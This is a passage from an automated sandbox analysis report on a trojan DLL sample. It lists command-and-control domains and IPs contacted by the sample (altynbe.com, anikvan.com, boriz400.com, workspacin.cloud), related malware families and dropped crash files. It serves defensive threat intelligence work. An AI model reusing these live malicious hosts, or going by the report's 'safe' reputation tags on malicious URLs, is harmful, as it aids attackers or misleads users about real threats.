                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://workspacin.cloud/explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://altynbe.com/Xrundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepPrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://schemas.microexplorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://altynbe.com/drundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://anikvan.com/api/azure==rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfErundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://altynbe.com/5~rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://boriz400.com/rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://api.msn.com/qexplorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjBrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://altynbe.com/api/azureurerundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://altynbe.com/=~rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/nrundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&jrundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://altynbe.com/api/azureprundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://upx.sf.netAmcache.hve.9.drfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              95.164.68.73
                                                                                                              		anikvan.comGibraltar
                                                                                                              		29632NASSIST-ASGItrue
                                                                                                              138.124.183.215
                                                                                                              		altynbe.comNorway
                                                                                                              		8983NOKIA-ASFItrue
                                                                                                              104.21.16.155
                                                                                                              		workspacin.cloudUnited States
                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                              3.69.236.35
                                                                                                              		ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.comUnited States
                                                                                                              		16509AMAZON-02USfalse
                                                                                                              91.194.11.183
                                                                                                              		boriz400.comRussian Federation
                                                                                                              		42994HQservCommunicationSolutionsILtrue
                                                                                                              54.175.181.104
                                                                                                              		ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.comUnited States
                                                                                                              		14618AMAZON-AESUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                              Analysis ID:1439879
                                                                                                              Start date and time:2024-05-11 00:03:08 +02:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 7m 12s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:28
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:1
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:upfilles.dll.dll
                                                                                                              (renamed file extension from exe to dll)
                                                                                                              Original Sample Name:upfilles.dll.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.evad.winDLL@32/17@8/6
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 28
                                                                                                              • Number of non-executed functions: 74

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.20
                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • VT rate limit hit for: upfilles.dll.dll

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              00:04:08API Interceptor1500037x Sleep call for process: rundll32.exe modified
                                                                                                              00:04:08API Interceptor1x Sleep call for process: loaddll64.exe modified
                                                                                                              00:04:11API Interceptor4x Sleep call for process: WerFault.exe modified
                                                                                                              00:04:51API Interceptor2619129x Sleep call for process: explorer.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              104.21.16.155uLBFBa5ZvB.exeGet hashmaliciousLatrodectusBrowse

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                workspacin.clouduLBFBa5ZvB.exeGet hashmaliciousLatrodectusBrowse
                                                                                                                • 104.21.16.155

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                AMAZON-02USi6iffN1t06.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                • 34.249.145.219
                                                                                                                https://southwest.app.link/3p?$3p=e_adobe_campaign_classic&$original_url=https%3A%2F%2Fsouthwest.com%3F%24deep_link%3Dtrue%26~campaign%3Dac_sec_promo_20230615_sale_wow%26clk%3DSECTEMPLATELOGO%26%24fallback_url%3Dhttps://firefliesops.web.appGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 108.138.128.44
                                                                                                                https://01xz.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 52.84.125.55
                                                                                                                https://eu-west-1.protection.sophos.com/?d=keysurgical.de&u=aHR0cHM6Ly93d3cua2V5c3VyZ2ljYWwuZGUvSG9tZS9TZWxlY3RMYW5ndWFnZT9sYW5ndWFnZT1lbi1VUyZyZWRpcmVjdFVybD1odHRwczovL2VuZXJncmVlbi5ycy8ud2VsbC1rbm93bi9hY21lLWNoYWxsZW5nZS8=&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=OE0wZTk1N0Y5dDJ6N29CQlM3RlRxNW5DbXpKbTRqcWJzeTE0UnZUZXJyTT0=&h=ccb3dc1d93924e5398cb784943bcbc84&s=AVNPUEhUT0NFTkNSWVBUSVaHyS6hqym7qLqtAI_LAX_uaGik92MJH8on0iF38froOAGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 3.162.163.114
                                                                                                                http://Cerberus-sharedoc.comGet hashmaliciousUnknownBrowse
                                                                                                                • 76.223.105.230
                                                                                                                dnriW2LcP1.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 34.249.145.219
                                                                                                                1XxZTVeKf6.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 34.243.160.129
                                                                                                                http://Cerberus-sharedoc.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                • 76.223.105.230
                                                                                                                f4twIqJjVs.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 34.243.160.129
                                                                                                                vsxqsQ9E2C.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 34.249.145.219
                                                                                                                HQservCommunicationSolutionsILQII19aQAik.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 91.194.11.55
                                                                                                                SecuriteInfo.com.Win32.DropperX-gen.26130.25747.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                • 45.144.29.148
                                                                                                                1DH6tNuQSm.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                • 45.144.29.148
                                                                                                                35Td7CFTVK.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                • 45.144.29.148
                                                                                                                https://s3.amazonaws.com/start-things/sjmarit/3.html#un/14227_md/1/2344/2071/58/37063Get hashmaliciousPhisherBrowse
                                                                                                                • 193.43.72.50
                                                                                                                https://s3.amazonaws.com/start-things/sjmarit/3.html#un/14204_md/1/2344/2071/49/107766Get hashmaliciousPhisherBrowse
                                                                                                                • 193.43.72.50
                                                                                                                PHQoJ3QygH.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                                                                • 45.144.28.125
                                                                                                                https://ontechrio.com/fg/?83291211Get hashmaliciousDarkGateBrowse
                                                                                                                • 45.144.28.244
                                                                                                                https://vivianecerqueira.adv.br/ecut/?05691211Get hashmaliciousDarkGateBrowse
                                                                                                                • 45.144.28.244
                                                                                                                https://ledscreen.africa/dcil/?77391211Get hashmaliciousDarkGateBrowse
                                                                                                                • 45.144.28.244
                                                                                                                CLOUDFLARENETUShttps://designerfloorsofhouston.comGet hashmaliciousUnknownBrowse
                                                                                                                • 104.16.117.116
                                                                                                                lctIZ.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 172.67.215.45
                                                                                                                europefridayedatingloverforchildern.jpg.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.21.84.67
                                                                                                                GsjNF.vbsGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.84.67
                                                                                                                https://southwest.app.link/3p?$3p=e_adobe_campaign_classic&$original_url=https%3A%2F%2Fsouthwest.com%3F%24deep_link%3Dtrue%26~campaign%3Dac_sec_promo_20230615_sale_wow%26clk%3DSECTEMPLATELOGO%26%24fallback_url%3Dhttps://firefliesops.web.appGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 104.17.2.184
                                                                                                                https://01xz.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 104.21.82.195
                                                                                                                https://eu-west-1.protection.sophos.com/?d=keysurgical.de&u=aHR0cHM6Ly93d3cua2V5c3VyZ2ljYWwuZGUvSG9tZS9TZWxlY3RMYW5ndWFnZT9sYW5ndWFnZT1lbi1VUyZyZWRpcmVjdFVybD1odHRwczovL2VuZXJncmVlbi5ycy8ud2VsbC1rbm93bi9hY21lLWNoYWxsZW5nZS8=&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=OE0wZTk1N0Y5dDJ6N29CQlM3RlRxNW5DbXpKbTRqcWJzeTE0UnZUZXJyTT0=&h=ccb3dc1d93924e5398cb784943bcbc84&s=AVNPUEhUT0NFTkNSWVBUSVaHyS6hqym7qLqtAI_LAX_uaGik92MJH8on0iF38froOAGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 104.17.2.184
                                                                                                                mrH7nYSmPU.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                • 104.26.5.15
                                                                                                                mrH7nYSmPU.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                • 104.26.5.15
                                                                                                                0CmMweT4Wf.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 172.67.205.94
                                                                                                                NOKIA-ASFIX7oMmXD99L.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 143.209.208.222
                                                                                                                JJXXAhUWC.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 138.124.184.247
                                                                                                                VtZtwUsgtrnEnlkxHy.ps1Get hashmaliciousNetSupport RATBrowse
                                                                                                                • 138.124.184.250
                                                                                                                tOUKLPvSz.ps1Get hashmaliciousNetSupport RATBrowse
                                                                                                                • 138.124.184.250
                                                                                                                HQuxVxuLV.ps1Get hashmaliciousNetSupport RATBrowse
                                                                                                                • 138.124.184.250
                                                                                                                x1b5bmJgLm.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 138.125.13.165
                                                                                                                FZAuI72f4q.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 138.126.170.50
                                                                                                                WFdAK6HQgz.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 135.39.41.180
                                                                                                                https://j4tpu.bpmsafelink.com/c/0aR4TTLkLUqplUI-2TrhdAGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 138.124.184.68
                                                                                                                dugw41p62T.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 135.22.62.0
                                                                                                                NASSIST-ASGIINVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 94.131.14.66
                                                                                                                http://pixelread.comGet hashmaliciousUnknownBrowse
                                                                                                                • 94.131.101.214
                                                                                                                MDE_File_Sample_8d9e7171af105f6468825bf20138d02a7b068c50.zipGet hashmaliciousUnknownBrowse
                                                                                                                • 94.131.101.129
                                                                                                                http://bavettessteakhouse.comGet hashmaliciousUnknownBrowse
                                                                                                                • 94.131.101.214
                                                                                                                http://svif-venezuela.comGet hashmaliciousUnknownBrowse
                                                                                                                • 94.131.101.129
                                                                                                                MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                                                                                • 94.131.101.180
                                                                                                                RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 94.131.14.66
                                                                                                                https://islandwaysorbet.comGet hashmaliciousUnknownBrowse
                                                                                                                • 94.131.101.129
                                                                                                                http://svif-venezuela.com/Get hashmaliciousUnknownBrowse
                                                                                                                • 94.131.101.129
                                                                                                                http://asana.wfGet hashmaliciousUnknownBrowse
                                                                                                                • 94.131.101.65

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                a0e9f5d64349fb13191bc781f81f42e1zTegZAXLub.msiGet hashmaliciousVMdetectBrowse
                                                                                                                • 104.21.16.155
                                                                                                                mrH7nYSmPU.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                • 104.21.16.155
                                                                                                                mrH7nYSmPU.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                • 104.21.16.155
                                                                                                                0CmMweT4Wf.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.16.155
                                                                                                                TePd86X60h.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.16.155
                                                                                                                jHLijDfFFA.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.16.155
                                                                                                                nMkQ2yFWe4.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                • 104.21.16.155
                                                                                                                nMkQ2yFWe4.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                • 104.21.16.155
                                                                                                                NFs_76042.msiGet hashmaliciousPrivateLoader, VMdetectBrowse
                                                                                                                • 104.21.16.155
                                                                                                                Purchase Order is approved20240509.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                • 104.21.16.155
                                                                                                                37f463bf4616ecd445d4a1937da06e197Tat3LP3VY.msiGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                2R78NbtrsM.msiGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                europefridayedatingloverforchildern.jpg.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                INV_#016789.vbsGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                uLBFBa5ZvB.exeGet hashmaliciousLatrodectusBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                verycuteflowerpictureimage.jpg.vbsGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                mexicodatingloverforchildern.jpg.vbsGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                itBEKxL3Gw.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183
                                                                                                                SR-968_Equip_Matl_WDS_rev.Aa_04302024.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • 95.164.68.73
                                                                                                                • 54.175.181.104
                                                                                                                • 138.124.183.215
                                                                                                                • 3.69.236.35
                                                                                                                • 91.194.11.183

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_964e80f5d1a5f925558a7e6299462efecb949df_9db0ef65_6fb130ca-cac1-4736-bec2-e227247d8b1e\Report.wer

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.7695669651831538
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:0SFi/iSyKyosj+4RvNxrfNrQXIDcQOc6ncECcw3l+XaXz+HbHgSQgJjZh88Wpoxf:3ciSyoA80wjIx8jbyzuiFeZ24lO83l
                                                                                                                MD5:F38F1F5A2799280E9AE9ECAED3D4D7F2
                                                                                                                SHA1:614B13F3576A06B0A5D66A28720AD52CD48F64F1
                                                                                                                SHA-256:73EACA5144E5222EA3859908633BE224CDF2CD699D28056A5D123197108AFA1D
                                                                                                                SHA-512:B9504BAE2E55AB063A7D732A66DBD0739F937C3A3F9B1ED05B2C9E54966B1D4A4FF1AF7BF0FA1B5BC023C7BFA404DDCCC9217463CBFCCB67275A9DBB3F848250
                                                                                                                Malicious:false
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.8.7.5.7.2.1.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.8.5.2.2.4.9.1.1.6.5.9.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.b.1.3.0.c.a.-.c.a.c.1.-.4.7.3.6.-.b.e.c.2.-.e.2.2.7.2.4.7.d.8.b.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.f.0.0.0.3.c.-.c.f.1.a.-.4.8.1.3.-.9.0.a.4.-.5.5.b.6.8.a.f.9.f.4.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.u.p.f.i.l.l.e.s...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.8.-.0.0.0.1.-.0.0.1.4.-.8.e.2.1.-.0.7.f.b.2.5.a.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_964e80f5d1a5f925558a7e6299462efecb949df_9db0ef65_d9b8934c-437b-450d-af46-0185962b24b1\Report.wer

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
